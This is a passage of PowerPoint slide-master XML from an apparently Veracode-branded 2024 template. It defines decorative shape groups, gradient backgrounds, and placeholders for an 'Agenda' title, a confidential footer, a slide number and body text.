              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA13BA9D-B9F1-B962-5B20-A64782D5BDBB}"/>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0" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80DA9A5-C25A-8394-D9D8-53144C8E9BEC}"/>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23" name="Group 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD24D7DF-9A50-754C-C156-066E42208262}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4830844"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F97A0F-CC2C-B072-E22F-8940D24FD1A8}"/>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37" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9ADCC1-84F6-52C7-98D3-FCFE23AA4D55}"/>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24" name="Group 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47179E5C-5229-5EFF-9C5B-92CF87FB3637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4132610"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D74524-43A5-713E-7890-AAD5A2ED7924}"/>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34" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F2964D-98B2-A4E3-C8C9-6B95CCE8BBA9}"/>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25" name="Group 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D67F1644-191E-EDD3-4B0F-A0616A120C38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="6227315"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7AA1C91-9C25-5108-7414-7A1FA4762527}"/>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31" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A78ABB-7D46-808A-ACE9-FA45231958C8}"/>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26" name="Group 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{576DEDDC-BA8F-E2D3-D7BB-295FB2AC2001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="5529078"/>
              <a:ext cx="1795782" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="1795782" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C808C07-3BF7-34A7-D08D-D66D64D3B25F}"/>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28" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A199BE8-DC2F-491C-9B8E-8182D095A4DA}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C5EAAB-9247-204B-A613-8A0A50BA7DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397497" y="449808"/>
            <a:ext cx="2471828" cy="98552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b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{811BD228-B999-064B-BCA6-121266B74516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94823372-C844-4842-9C0C-0C37016D9E55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9B91BC-4D04-FB92-5794-9542EF5EE4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499386" y="757195"/>
            <a:ext cx="6801977" cy="5272129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294458831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3_Title_Dark_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="43000">
              <a:srgbClr val="007EA2"/>
            </a:gs>
            <a:gs pos="1000">
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="99000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="8100000" scaled="1"/>
          <a:tileRect/>
        </a:gra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D8DE3857-C9AB-F3DB-4001-0886EB857CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9497086" y="-12415"/>
            <a:ext cx="2694914" cy="6882829"/>
            <a:chOff x="5796289" y="-63014"/>
            <a:chExt cx="2721059" cy="6949602"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="76000">
                <a:schemeClr val="accent4">
                  <a:alpha val="10281"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="463" name="Group 462">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069C532D-1E38-81FA-83A3-375C4536C4F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="641440"/>
              <a:ext cx="2721059" cy="1362196"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="1362196"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="464" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD256094-2693-A35F-CC1C-F8A35B7F6200}"/>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65" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2296A149-A69D-76C6-9FCC-08A109691400}"/>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66" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1830890-73C8-7E79-A35E-4AFCA82BBEC1}"/>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82" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F575B5B2-855A-AA91-E410-B8AD4A103F7E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6936261" y="1992224"/>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83" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06A9C11-F917-4953-DF18-3E1892F302B1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7861538" y="1992224"/>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477" name="Group 476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02203CE-B363-63EF-B9C2-93A31CB1D853}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="-63014"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="478" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F536C978-A71C-D0E5-0BB1-5F6D0279D535}"/>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79" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05F99FD-76B3-D361-E17F-06D2FD629C61}"/>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80" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EDA22B-2E76-9794-FBC6-AEF51604347B}"/>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485" name="Group 484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D5F0EC-0C97-0452-BA25-0391E3A0042B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2037908"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="486" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78073BAF-B776-B8B2-A97F-AEF5C163523A}"/>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87" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2043221B-4850-2F04-AE08-EED1A1080FE4}"/>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88" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50F14B7-3635-6261-C251-2F4C782946C8}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Graphic 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3ABEB2-5192-BEAA-3D88-643F1623D83D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796289" y="1339674"/>
              <a:ext cx="870505" cy="659272"/>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nvGrpSpPr>
            <p:cNvPr id="496" name="Group 495">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA76DD7-4B64-5648-8707-CB49AA2C9552}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="3434376"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="497" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D05BA6F-8FA3-12B8-1510-B4CB6B143946}"/>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98" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B719725F-1058-C7CF-78FD-8F87EB668E8A}"/>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499" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3E1150-070A-0F77-B94D-99332969B506}"/>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04" name="Group 503">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32CF890E-1227-81D3-EE7F-DDF7D3BB767C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="2736142"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="505" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9D8EEE-5120-AF68-F089-4CB55CDF3CD6}"/>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06" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8427990E-DEBA-6E62-3987-814189786493}"/>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07" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E6C371E-194A-D4E3-FEC0-AD6F826DB110}"/>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12" name="Group 511">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C443C7E-300F-5567-646E-47BADFD0653A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4830844"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="513" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A116024-7CED-ABC2-AEAE-B2AF0655A0FE}"/>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14" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D350D5-C214-7E68-0E2F-775ACBAE20E9}"/>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15" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63316F3C-2081-BD52-54C2-050E2D942777}"/>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20" name="Group 519">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7944809E-531C-AA50-D0C7-D2D338C5371B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="4132610"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="521" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114A3463-3F96-D1FF-756C-4E740A5E5403}"/>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22" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E67210-D385-AA24-D5A0-0BA7F46D3EEF}"/>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23" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7A979A-48F2-7DD3-D200-FA8013C0BAB3}"/>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28" name="Group 527">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08321C2C-931E-FC12-38E0-FEF961DB1BE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="6227315"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="529" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B248FD-6035-4329-0928-424BEDDE385C}"/>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0" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804BEE8A-8DFF-D7D3-6C22-5C2AEEB5E5DC}"/>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1" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC0963D-5C01-4CB6-3082-206B155FC908}"/>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nvGrpSpPr>
            <p:cNvPr id="536" name="Group 535">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55029D81-4C96-BD14-DFBB-CE03171FC56F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796289" y="5529078"/>
              <a:ext cx="2721059" cy="659273"/>
              <a:chOff x="6010984" y="1289301"/>
              <a:chExt cx="2721059" cy="659273"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="537" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE803A4-BEE5-217F-E1D9-528AE18DB9F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6010984"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8" name="Graphic 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD21D53C-E40B-8058-46DA-F5278A5C6BBC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6936261"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sp>
            <p:nvSpPr>
              <p:cNvPr id="539" name="Graphic 3">
